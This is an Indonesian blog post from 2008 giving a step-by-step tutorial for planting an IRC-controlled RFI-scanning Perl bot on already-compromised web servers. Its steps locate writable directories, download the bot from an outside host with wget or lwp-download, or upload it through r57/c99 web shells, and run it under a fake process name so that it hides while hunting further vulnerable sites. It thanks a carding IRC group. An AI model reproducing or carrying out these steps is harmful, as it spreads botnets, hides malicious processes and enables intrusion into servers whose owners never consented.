Senin, 28 Juli 2008

Cara Membuat Bot Scan RFI di mIRC

1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam
format txt, ato anda juga bisa langsung menggunakan milik saya

2. Masuk ke shell anda

3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”

4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp

5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”

6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”

7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt

8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”

9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”

10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help

11. Silahkan dipergunakan sebaik mungkin (untuk cari targetlah masa situs bokep)


KETERANGAN:
1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
3. Semua command di atas tanpa tanda petik dua (”)

SEMOGA MEMBANTU TEMEN-TEMEN........


sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..


Thanks To YogyaCarderLink@DALnet
- JaLi-
- AnaK_Naga_
- g0nz
- CCard_boys
- Sabreetooth

Tidak ada komentar:

Posting Komentar